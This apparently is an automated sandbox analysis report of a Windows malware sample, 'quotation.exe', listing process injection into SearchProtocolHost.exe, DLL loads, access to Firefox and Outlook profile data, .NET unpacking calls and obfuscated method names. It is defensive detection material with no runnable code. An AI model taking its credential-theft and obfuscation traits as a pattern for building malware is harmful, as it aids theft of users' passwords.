                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SearchProtocolHost.exe, 00000006.00000003.2565934336.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2565504142.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: quotation.exeReversingLabs: Detection: 39%
                Source: unknownProcess created: C:\Users\user\Desktop\quotation.exe "C:\Users\user\Desktop\quotation.exe"
                Source: C:\Users\user\Desktop\quotation.exeProcess created: C:\Users\user\Desktop\quotation.exe "C:\Users\user\Desktop\quotation.exe"
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\quotation.exeProcess created: C:\Users\user\Desktop\quotation.exe "C:\Users\user\Desktop\quotation.exe"Jump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: tquery.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\quotation.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: quotation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gkTgnrvdOG.exe, 00000005.00000002.4519132239.0000000000B5E000.00000002.00000001.01000000.0000000C.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520216531.0000000000B5E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: quotation.exe, 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2381531923.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2384137153.0000000003024000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: quotation.exe, quotation.exe, 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000006.00000003.2381531923.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2384137153.0000000003024000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdbUGP source: gkTgnrvdOG.exe, 00000005.00000003.2320609449.000000000152B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdb source: gkTgnrvdOG.exe, 00000005.00000003.2320609449.000000000152B000.00000004.00000001.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.quotation.exe.7b50000.4.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, vaqtyES1x9bnG2cr2n.cs.Net Code: GoPHorQdXd System.Reflection.Assembly.Load(byte[])
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, vaqtyES1x9bnG2cr2n.cs.Net Code: GoPHorQdXd System.Reflection.Assembly.Load(byte[])
                Source: 0.2.quotation.exe.4551d80.1.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, vaqtyES1x9bnG2cr2n.cs.Net Code: GoPHorQdXd System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\quotation.exeCode function: 0_2_02BC0B69 push ebx; iretd 0_2_02BC0B7B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00414B10 push edx; retf A241h3_2_00414B38
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00405057 push es; retf 3_2_00405075
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00416074 push eax; retf 3_2_0041609C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00412176 push edx; iretd 3_2_00412179
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0040AC7B push es; retf 3_2_0040AC88
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00403400 push eax; ret 3_2_00403402
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00411CE9 push esp; retf 3_2_00411C7E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_00415FBD pushad ; retf 3_2_00415FBE
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B09AD push ecx; mov dword ptr [esp], ecx3_2_012B09B6
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0128135E push eax; iretd 3_2_01281369
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032009AD push ecx; mov dword ptr [esp], ecx6_2_032009B6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1E52B push ebp; retf 6_2_02A1E533
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1E8E6 push esp; retf 6_2_02A1E87B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A1ED73 push edx; iretd 6_2_02A1ED76
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A2564E push eax; retf 6_2_02A2564F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A17878 push es; retf 6_2_02A17885
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A2B9E3 push es; retf 6_2_02A2B9E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A11C54 push es; retf 6_2_02A11C72
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A2BD02 push cs; iretd 6_2_02A2BD05
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A2BD45 push FFFFFFB7h; retf 6_2_02A2BD52
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0352634D push ebx; ret 6_2_0352634E
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_035351E2 push eax; ret 6_2_035351E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0352A42B push BF809140h; iretd 6_2_0352A430
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_035249A1 push ecx; ret 6_2_035249B2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03525F21 push 0D885E92h; iretd 6_2_03525F33
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03525E9A push ebx; retf 6_2_03525EAB
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03524C5B push esp; iretd 6_2_03524C61
                Source: quotation.exeStatic PE information: section name: .text entropy: 7.780021412382436
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, nsQnYy8dO0FVqgqTup.csHigh entropy of concatenated method names: 'EDTGJibXcb', 'WqgGdiFdGY', 'LkfGoltwd7', 'QqyGQ7YtVT', 'MN5GZiModv', 'LiBG2ADYb4', 'iKvGctBrTx', 'eMYG74rpfv', 'oe3Gn94SX5', 'ntAGpPl64r'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, AXHIhE0rrbcxCnaSwa.csHigh entropy of concatenated method names: 'AmdhRDPZpS', 'o1JhstP8Sm', 'CfOhEo1f5I', 'JFOhGobND8', 'r5dhS32mCc', 'tOvExWhlIc', 'aXLEaV5K15', 'BnLE3CAVwQ', 'eXOEPcQmgV', 'wv4EC6FqVG'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, uxQMiJaExfnfdS5k0A.csHigh entropy of concatenated method names: 'ADZOP4Bbto', 'JUSODHDc7B', 'zsLtrOdOtG', 'xvltyJ5ZrC', 'pieOkFISv1', 'LqTObq7sA2', 'zXUOBFa4RH', 'UgsO5sZea5', 'fKKOT1MjB4', 'y7uOFWdU9h'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, PhE7cd7e532AwGMfh6.csHigh entropy of concatenated method names: 'J9Zs5lvcdp', 'nSlsTFpyMM', 'i8hsFCwHlV', 'Ym0swvsNWE', 'xJEsxKVJl2', 'zRgsaYwufk', 'rses3jJ6Xu', 'HQHsPQ3PgR', 'a1PsCIaCiW', 'hXVsDL1rAC'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, vlWaM4C0ajeeFEGTEg.csHigh entropy of concatenated method names: 'bFxV0AQuDU', 'Q1rVunxaFs', 'GXHVmfrpY2', 'revVW8vEuu', 'YMxVAWuXM2', 'kSoVve0PN8', 'd1LVKJTe9Z', 'V0yVUSu2ul', 'g5gV8QNNmB', 'vvWVXBxqjo'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, XBl1RTsAAfAQTYAK48.csHigh entropy of concatenated method names: 'Dispose', 'KTDyCEuN3u', 'RaTeuwx9wT', 'TaZe0Rwpa8', 'l8xyDgQqrx', 'qFxyzyO4Yc', 'ProcessDialogKey', 'n44erlWaM4', 'GajeyeeFEG', 'REgee3HUr1'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, pj3NRjnY9uvN4UEA5l.csHigh entropy of concatenated method names: 'iuMYQimpL2', 'CGhY2ZiWFF', 'zpkY7tYv53', 'BaZYnWHxwG', 'b34YjOjCsn', 'bH1YidHkYY', 'KHwYObcbjS', 'y7KYteiPDH', 'qv4YVafHZw', 'wVCYlLH3Mg'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, zuXSPG36xvTDEuN3u9.csHigh entropy of concatenated method names: 'XEHVjkR7Rc', 'FcVVOUHC1j', 'khRVVmjrZG', 'aSLVNLbeCU', 'pMhV4nuToL', 'GYhVMSCp5T', 'Dispose', 'IXdtftYN0e', 'LeLtsDaZXY', 'XOftYVYDSl'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, AV5lmgHwybY1fD7Qff.csHigh entropy of concatenated method names: 'A8ByGhE7cd', 'b53yS2AwGM', 'oY9y9uvN4U', 'hA5yLlJXC9', 'GLjyjpGQXH', 'chEyirrbcx', 'FppNjHZWJVEH1lvmUM', 'njbHOZnk7V41CY0mQL', 'jhbHcaHtrXFeSH0xfr', 'rxNyyXtBAd'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, pLPQt4Bn5xe9eGEnMM.csHigh entropy of concatenated method names: 'L5Tg7mPM3Y', 'cHYgn1goK3', 'vYYg0y8Mdt', 'ErBguuwW1T', 'exXgW4njyO', 'YKLgAtFJcT', 'LdKgK9EiZF', 'KMNgUoT44Y', 'gBEgXruiWT', 'Gmygk7j37b'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, hvjmokKZ8lLbKLChpk.csHigh entropy of concatenated method names: 'W5MGf0rSEK', 'ogUGY3UK9G', 'A9XGhfn4MN', 'ne6hD4p4Bm', 'f4XhzhvLu0', 'eR3GryqJEZ', 'rInGyiNQiQ', 'KRnGenZZ0D', 'JUpGIe82kg', 'eWuGHKnCFd'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, f5eyUHyyHuPqjuGZm6k.csHigh entropy of concatenated method names: 'm5LlDiO1kl', 'keFlzP2FqI', 'GNDNr8s51a', 'TRmNyo6v2L', 'df8NekPfgu', 'v6INIvTfLG', 'NZjNHANO9n', 'FQZNRx05ho', 'vs2NfjY0Pg', 'ulaNs9TepV'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, pZk3pLyIopLDLWvc0Hn.csHigh entropy of concatenated method names: 'bwvNDQ5MAt', 'XVxNzqcQvL', 'JgV1rIIjf9', 'og3Ctj8MTiDvUmpde5c', 'GRQuXB8ImeoITCrN6a4', 'Soq22v8kg9IIAysMCKd', 'qtPdWK8QGh4mwmHa1Um'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, LVKrllyrPiAikE2cPtv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ne6lkgOZrO', 'v8DlbYfTBN', 'UnnlBpjkHy', 'bJPl5gb736', 'zkQlTtnVih', 'cwXlF3g0Aj', 'nyslwIm1K7'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, Dfi3HJz6ikG3sKKhh1.csHigh entropy of concatenated method names: 'thPl23mftU', 'Odkl7icTOI', 'jHrlnTiryn', 'O1ml061qGu', 'tgtluK9EdV', 'zNWlWjJasN', 'CLklAk25Bh', 'QWSlMQo8sa', 'nQnlJZR8VO', 'RPEldew2Up'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, kFdrDa5ana4OP3ed6e.csHigh entropy of concatenated method names: 'U77jXhXNvi', 'v6vjbukldE', 'NEbj5W83Zm', 'q9FjTWVvlM', 'eEbju8iqG2', 'nbLjmmNihY', 'SN3jWYpF6w', 'oZJjAKVXcD', 'GoBjvpmJA5', 'PJGjKjm1V8'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, FQvWyceLfRPdjLfgif.csHigh entropy of concatenated method names: 'j9woIMtDY', 'z1vQIqLmb', 'V7B21sqEr', 'KaSc1Yawp', 'VZVn7Tvje', 'DMwp5bsXE', 'uhAx7oq7nLCrx1AP8V', 'uV3GsDddG4ivsL5Ykr', 'NbjtW1q9Z', 'VJAlxxgKg'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, WHUr1BDNicOTIAbIO1.csHigh entropy of concatenated method names: 'iFSlYbOnP5', 'v9JlEsLwNc', 'kBalhyKlYU', 'perlGirtQt', 'bRhlVuwRV5', 'GuUlSGdgKO', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, igLjZEwuy4ncxaKpZG.csHigh entropy of concatenated method names: 'By5O9dcHS9', 'iLXOLP1gVW', 'ToString', 'ClZOf1OUVO', 'BZkOsD7OmR', 'xXhOY4XYro', 'Br8OEsLacx', 'U1NOhdT3cq', 'FjSOGwQ8L2', 'pDWOSKDD8B'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, vaqtyES1x9bnG2cr2n.csHigh entropy of concatenated method names: 'jBrIRJgyk5', 'AyyIfj5FTU', 'WLUIssEqQF', 'qtQIY3aJGw', 'ngkIEih9l0', 'NjIIhhug6P', 'P9YIGebqcP', 'ciDISYlisX', 'XGnI6h3YuJ', 'kK9I9RBAqO'
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, HbMDW0yHdZOtr5rC1qi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gPD1VG5fKD', 'XZQ1lTdLtc', 'Bqe1NH7hXe', 'z2S11Adu1K', 'G7f14FYL0m', 'G0R1qavvgM', 'OuK1MNgODM'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, nsQnYy8dO0FVqgqTup.csHigh entropy of concatenated method names: 'EDTGJibXcb', 'WqgGdiFdGY', 'LkfGoltwd7', 'QqyGQ7YtVT', 'MN5GZiModv', 'LiBG2ADYb4', 'iKvGctBrTx', 'eMYG74rpfv', 'oe3Gn94SX5', 'ntAGpPl64r'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, AXHIhE0rrbcxCnaSwa.csHigh entropy of concatenated method names: 'AmdhRDPZpS', 'o1JhstP8Sm', 'CfOhEo1f5I', 'JFOhGobND8', 'r5dhS32mCc', 'tOvExWhlIc', 'aXLEaV5K15', 'BnLE3CAVwQ', 'eXOEPcQmgV', 'wv4EC6FqVG'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, uxQMiJaExfnfdS5k0A.csHigh entropy of concatenated method names: 'ADZOP4Bbto', 'JUSODHDc7B', 'zsLtrOdOtG', 'xvltyJ5ZrC', 'pieOkFISv1', 'LqTObq7sA2', 'zXUOBFa4RH', 'UgsO5sZea5', 'fKKOT1MjB4', 'y7uOFWdU9h'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, PhE7cd7e532AwGMfh6.csHigh entropy of concatenated method names: 'J9Zs5lvcdp', 'nSlsTFpyMM', 'i8hsFCwHlV', 'Ym0swvsNWE', 'xJEsxKVJl2', 'zRgsaYwufk', 'rses3jJ6Xu', 'HQHsPQ3PgR', 'a1PsCIaCiW', 'hXVsDL1rAC'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, vlWaM4C0ajeeFEGTEg.csHigh entropy of concatenated method names: 'bFxV0AQuDU', 'Q1rVunxaFs', 'GXHVmfrpY2', 'revVW8vEuu', 'YMxVAWuXM2', 'kSoVve0PN8', 'd1LVKJTe9Z', 'V0yVUSu2ul', 'g5gV8QNNmB', 'vvWVXBxqjo'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, XBl1RTsAAfAQTYAK48.csHigh entropy of concatenated method names: 'Dispose', 'KTDyCEuN3u', 'RaTeuwx9wT', 'TaZe0Rwpa8', 'l8xyDgQqrx', 'qFxyzyO4Yc', 'ProcessDialogKey', 'n44erlWaM4', 'GajeyeeFEG', 'REgee3HUr1'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, pj3NRjnY9uvN4UEA5l.csHigh entropy of concatenated method names: 'iuMYQimpL2', 'CGhY2ZiWFF', 'zpkY7tYv53', 'BaZYnWHxwG', 'b34YjOjCsn', 'bH1YidHkYY', 'KHwYObcbjS', 'y7KYteiPDH', 'qv4YVafHZw', 'wVCYlLH3Mg'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, zuXSPG36xvTDEuN3u9.csHigh entropy of concatenated method names: 'XEHVjkR7Rc', 'FcVVOUHC1j', 'khRVVmjrZG', 'aSLVNLbeCU', 'pMhV4nuToL', 'GYhVMSCp5T', 'Dispose', 'IXdtftYN0e', 'LeLtsDaZXY', 'XOftYVYDSl'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, AV5lmgHwybY1fD7Qff.csHigh entropy of concatenated method names: 'A8ByGhE7cd', 'b53yS2AwGM', 'oY9y9uvN4U', 'hA5yLlJXC9', 'GLjyjpGQXH', 'chEyirrbcx', 'FppNjHZWJVEH1lvmUM', 'njbHOZnk7V41CY0mQL', 'jhbHcaHtrXFeSH0xfr', 'rxNyyXtBAd'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, pLPQt4Bn5xe9eGEnMM.csHigh entropy of concatenated method names: 'L5Tg7mPM3Y', 'cHYgn1goK3', 'vYYg0y8Mdt', 'ErBguuwW1T', 'exXgW4njyO', 'YKLgAtFJcT', 'LdKgK9EiZF', 'KMNgUoT44Y', 'gBEgXruiWT', 'Gmygk7j37b'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, hvjmokKZ8lLbKLChpk.csHigh entropy of concatenated method names: 'W5MGf0rSEK', 'ogUGY3UK9G', 'A9XGhfn4MN', 'ne6hD4p4Bm', 'f4XhzhvLu0', 'eR3GryqJEZ', 'rInGyiNQiQ', 'KRnGenZZ0D', 'JUpGIe82kg', 'eWuGHKnCFd'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, f5eyUHyyHuPqjuGZm6k.csHigh entropy of concatenated method names: 'm5LlDiO1kl', 'keFlzP2FqI', 'GNDNr8s51a', 'TRmNyo6v2L', 'df8NekPfgu', 'v6INIvTfLG', 'NZjNHANO9n', 'FQZNRx05ho', 'vs2NfjY0Pg', 'ulaNs9TepV'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, pZk3pLyIopLDLWvc0Hn.csHigh entropy of concatenated method names: 'bwvNDQ5MAt', 'XVxNzqcQvL', 'JgV1rIIjf9', 'og3Ctj8MTiDvUmpde5c', 'GRQuXB8ImeoITCrN6a4', 'Soq22v8kg9IIAysMCKd', 'qtPdWK8QGh4mwmHa1Um'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, LVKrllyrPiAikE2cPtv.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ne6lkgOZrO', 'v8DlbYfTBN', 'UnnlBpjkHy', 'bJPl5gb736', 'zkQlTtnVih', 'cwXlF3g0Aj', 'nyslwIm1K7'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, Dfi3HJz6ikG3sKKhh1.csHigh entropy of concatenated method names: 'thPl23mftU', 'Odkl7icTOI', 'jHrlnTiryn', 'O1ml061qGu', 'tgtluK9EdV', 'zNWlWjJasN', 'CLklAk25Bh', 'QWSlMQo8sa', 'nQnlJZR8VO', 'RPEldew2Up'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, kFdrDa5ana4OP3ed6e.csHigh entropy of concatenated method names: 'U77jXhXNvi', 'v6vjbukldE', 'NEbj5W83Zm', 'q9FjTWVvlM', 'eEbju8iqG2', 'nbLjmmNihY', 'SN3jWYpF6w', 'oZJjAKVXcD', 'GoBjvpmJA5', 'PJGjKjm1V8'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, FQvWyceLfRPdjLfgif.csHigh entropy of concatenated method names: 'j9woIMtDY', 'z1vQIqLmb', 'V7B21sqEr', 'KaSc1Yawp', 'VZVn7Tvje', 'DMwp5bsXE', 'uhAx7oq7nLCrx1AP8V', 'uV3GsDddG4ivsL5Ykr', 'NbjtW1q9Z', 'VJAlxxgKg'
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, WHUr1BDNicOTIAbIO1.csHigh entropy of concatenated method names: 'iFSlYbOnP5', 'v9JlEsLwNc', 'kBalhyKlYU', 'perlGirtQt', 'bRhlVuwRV5', 'GuUlSGdgKO', 'Next', 'Next', 'Next', 'NextBytes'
